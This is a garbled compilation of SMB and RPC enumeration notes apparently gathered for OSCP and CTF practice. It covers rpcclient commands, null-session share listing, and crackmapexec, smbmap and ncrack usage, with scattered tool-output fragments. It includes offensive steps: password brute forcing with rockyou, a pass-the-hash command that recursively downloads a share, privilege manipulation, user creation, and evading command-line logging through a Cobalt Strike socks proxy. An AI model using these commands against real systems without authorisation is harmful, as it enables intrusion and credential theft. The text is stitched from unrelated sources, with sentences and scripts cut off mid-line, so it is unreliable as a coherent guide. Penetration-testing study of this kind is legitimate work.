When provided the username, it extracts information such as the username, Full name, Home Drive, Profile Path, Description, Logon Time, Logoff Time, Password set time, Password Change Frequency, RID, Groups, etc.

This information includes the Group Name, Description, Attributes, and the number of members in that group.

As with lsaenumsid, it was possible to extract the SID, but it was not possible to tell which user has that SID.

For this particular demonstration, we will first need a SID.

A Little Guide to SMB Enumeration.

Nmap script output (fragments):
  |_smb-vuln-ms10-061: false
  | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
  | Disclosure date: 2017-03-14
  | smb-enum-shares:

smbclient listing (fragments):
  Shortcut to New Folder (2).lnk      A      420  Sun Dec 13 05:24:51 2015
  1690825 blocks of size 2048.
OSCP notes: ACTIVE INFORMATION GATHERING

Next, we have two query-oriented commands.

Nmap script output (fragment):
  | Anonymous access:
This will use, as you point out, port 445. Most secure.

If proper privileges are assigned, it is also possible to delete a user using rpcclient.

This lab shows how it is possible to bypass command-line argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post-exploitation tool that supports socks proxying). Use `proxychains + command` to use the socks proxy.

This is purely my experience with CTFs, TryHackMe, VulnHub, and HackTheBox prior to enrolling in OSCP. Disclaimer: These notes are not in the context of any machines I had during the OSCP lab or exam. Adding it to the original post.

Using rpcclient we can enumerate usernames on those OSs just like a Windows OS.

and therefore do not correspond to the rights assigned locally on the server.

If in the above example the ttl=127, then it is safe to assume (from this information alone) that the host, 10.10.10.10, is a Linux host. On other systems, you'll find services and applications using port 139.

If the RID is used as the parameter, the samlookuprids command can extract the username relevant to that particular RID. After enumerating groups, it is possible to extract details about a particular group from the list. This can be done by providing the username and password followed by the target IP address of the server.

rpcclient options and commands (fragments of the help output):
  -U, --user=USERNAME   Set the network username
  logonctrl             Logon Control
  list                  List available commands on
  queryuseraliases      Query user aliases
  queryaliasmem         Query alias membership
  dsenumdomtrusts       Enumerate all trusted domains in an AD forest
  lookupdomain          Lookup Domain Name
  enumdata              Enumerate printer data
  enumforms             Enumerate forms
  getprinter            Get printer info

rpcclient session (fragments):
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1011
  result was NT_STATUS_NONE_MAPPED

smbmap output (fragments):
  Replication   READ ONLY
  ADMIN$        NO ACCESS
Query Group Information and Group Membership.

It is possible to target the group using the RID that was extracted while running enumdomgroups. It enumerates alias groups on the domain.

However, for this particular demonstration, we are using rpcclient. In there you may find many different batch, VBScript, and PowerShell scripts, using some discovered credentials.

RID is a suffix of the long SID in hexadecimal format. To begin the enumeration, a connection needs to be established. The next command that can help with the enumeration is lsaquery. Another command to use is enumdomusers.

The TTL drops by 1 each time it passes through a router.

The ability to manipulate a user doesn't end with creating a user or changing the password of a user.

The ability to interact with privileges doesn't end with the enumeration regarding the SID or privileges. Further, when the attacker used the same SID as a parameter for lsaenumprivaccount, they were able to enumerate the levels of privileges such as high, low, and attribute.

smbclient (null session), enum4linux.

rpcclient help (fragments):
  GENERAL OPTIONS
  sourcedata     Source data
  enumjobs       Enumerate print jobs
  netfileenum    Enumerate open files

rpcclient session (fragments):
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002
  S-1-5-21-1835020781-2383529660-3657267081-2003 LEWISFAMILY\user (2)
  S-1-5-21-1835020781-2383529660-3657267081-1003 LEWISFAMILY\daemon (2)
  S-1-5-21-1835020781-2383529660-3657267081-1000 LEWISFAMILY\root (1)

Tool output (fragments):
  [INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
  MAC Address = 00-50-56-XX-XX-XX
  [+] Finding open SMB ports.
  timeout connecting to 192.168.182.36:445
  ECHO Cracking Password.

Commands (fragments):
  if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
  if [ !
  proxychains nmap -sTV -n -PN -p 80,22 target-ip -vv
This command is made from LSA Query Security Object.

As from the previous commands, we saw that it is possible to create a user through rpcclient.

During our previous demonstrations, we were able to enumerate the permissions and privileges of users and groups based on the RID of that particular user. But it is also possible to get the password properties of individual users using the getusrdompwinfo command with the user's RID. In the demonstration, the user with RID 0x1f4 was enumerated regarding their password properties.

If these kinds of features are not enabled on the domain, then it is possible to brute-force the credentials on the domain.

To demonstrate this, the attacker first used the lsaaddpriv command to add the SeCreateTokenPrivilege to the SID and then used the lsadelpriv command to remove that privilege from that group as well. This command was able to enumerate two specific privileges, SeChangeNotifyPrivilege and SeNetworkLogonRight.

Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can even execute commands on writable shares.

Let's play with a few options:

You get the idea; it was pretty much the same for the Ubuntu guy, except that his user accounts were -3000.

First one - two Cobalt Strike sessions:
Second - attacker opens a socks4 proxy on port 7777 on his local kali machine (10.0.0.5) by issuing:

What permissions must be assigned to the newly created files?

Password checking, if you found one with other enumeration.

without the likes of: which most likely are monitored by the blue team.

Metasploit SMB auxiliary scanners.

rpcclient help (fragments):
  SPOOLSS
  setprinterdata   Set REG_SZ printer data
  lookupnames      Convert names to SIDs
  none             Force RPC pipe connections to have no special properties

rpcclient session (fragments):
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013
  rpcclient $> lookupnames lewis

smbclient output (fragments):
  Sharename       Type      Comment
  New Folder (9)      D        0  Sun Dec 13 05:26:59 2015
It is also possible to manipulate the privileges of that SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether.

rpcclient is a part of the Samba suite on Linux distributions. The next command that can be used via rpcclient is querydominfo.

There are numerous tools and methods to perform enumeration; we will be finding different types of information on SMB throughout the article.

Obviously the SIDs are different, but you can still pull down the usernames and start brute-forcing those other open services.

is SMB over IP.

Wordlist dictionary.

Password attack (Brute-force): brute-force service password.

can be cracked with,

For passwordless login, add id_rsa.pub to the target's authorized_keys.

Add the extracted domain to /etc/hosts and dig again.

guest access disabled, uses encryption.

Pentesting Cheatsheets.

rpcclient help (fragments):
  -P, --machine-pass   Use stored machine account password
  querydominfo         Query domain info
  lsaenumsid           Enumerate the LSA SIDS
  getdriver            Get print driver information

rpcclient session (fragments):
  Enter WORKGROUP\root's password:
  rpcclient $> queryuser msfadmin

Tool output (fragments):
  Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds.
  ..                                  D        0  Thu Sep 27 16:26:00 2018
  [+] User SMB session establishd on [ip]

Commands:
  rpcclient --user="" --command=enumprivs -N 10.10.10.10
  rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np    # get pipe names
  smbclient -L //10.10.10.10 -N                     # no password (SMB null session)
  crackmapexec smb 10.10.10.10 -u '' -p '' --shares
  crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares
  crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares
  crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name
  crackmapexec smb 192.168.0.115 -u '' -p '' --shares --pass-pol
  ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v
  mount -t cifs "//10.1.1.1/share/" /mnt/wins
  mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0
All this can be observed in the usage of the lsaenumprivaccount command. After manipulating the privileges on the different users and groups, it is possible to enumerate the values of those specific privileges for a particular user using the lsalookupprivvalue command. In the previous demonstration, the attacker was able to grant and remove privileges for a group.

It contains contents from other blogs for my quick reference.

[Update 2018-12-02] I just learned about smbmap, which is just great. smbmap -H [ip/hostname] will show what you can do with given credentials (or a null session if no credentials).

With some input from the NetSecFocus group, I'm building out an SMB enumeration checklist here.

Here's an example, Unix Samba 2.2.3a:

Windows SMB is more complex than just a version, but looking in Wireshark will give a bunch of information about the connection.

From Apache version to finding Ubuntu version -> ubuntu httpd versions.

: Private key that is used for login.

Commands:
  nmap -sV --script=vulscan/vulscan.nse    (https://securitytrails.com/blog/nmap-vulnerability-scan)
  masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
  ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
  nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A
  (performs a full scan instead of a SYN scan to prevent getting flagged by firewalls)

Tool output (fragments):
  Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-27 16:25 EDT
  445/tcp open  microsoft-ds
  [hostname] <20> - M
  [DATA] 1 tasks, 1 servers, 816 login tries (l:1/p:816), ~816 tries per task
  result was NT_STATUS_NONE_MAPPED
  share   Disk
To explain how this fits in, let's look at the examples below: when an object is created within a domain, the number above (the SID) will be combined with a RID to make a unique value used to represent the object.

This is made from the words get domain password information.

In the demonstration, it can be observed that lsaenumsid has enumerated 20 SIDs within the Local Security Authority, or LSA.

Common share names for Windows targets are,

You can try to connect to them by using the following command:
  # null session to connect to a windows share
  # authenticated session to connect to a windows share (you will be prompted for a password)
  "[+] creating a null session is possible for
  # no output if command goes through, thus assuming that a session was created
  # echo error message (e.g.

RPC/SMB/NetBios exploiting tutorials : r/oscp - Reddit
https://github.com/s0wr0b1ndef/OSCP-note/

rpcclient help (fragment):
  enumdrivers   Enumerate installed printer drivers

rpcclient session (fragment):
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2001

Nmap script output (fragments):
  | A buffer overflow vulnerability in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1
  | \\[ip]\IPC$:

smbclient listing (fragment):
  D        0  Thu Sep 27 16:26:00 2018
It is possible to perform enumeration regarding the privileges for a group or a user based on their SID as well.

The group information helps the attacker plan their way to the Administrator or elevated access. The article is focused on Red Teamers, but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed.

This will attempt to connect to the share.

The hash can then be cracked offline or used in an

Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging

ENUMERATING USER ACCOUNTS ON LINUX AND OS X WITH RPCCLIENT
Hacking Samba on Ubuntu and Installing the Meterpreter

SMB2   Windows Vista SP1 and Windows 2008

Commands:
  nmap -n -v -Pn -p139,445 -sV 192.168.0.101
  nmap --script smb-enum-shares -p 139,445 $ip
  # if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
  smbclient -L \\$ip --option='client min protocol=NT1'
  smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1'
  smbclient \\\\192.168.1.101\\admin$ -U t-skid
  # Will list all shares with available permissions
  # Connect with valid username and password
  smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1
  smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
  # download everything recursively in the wwwroot share to /usr/share/smbmap
  smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*'
  | grep -oP 'UnixSamba.

rpcclient help (fragments):
  debuglevel   Set debug level
  lookupsids   Convert SIDs to names

rpcclient session (fragments):
  password:
  rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2000

Tool output (fragment):
  [STATUS] 29.00 tries/min, 29 tries in 00:01h, 787 todo in 00:28h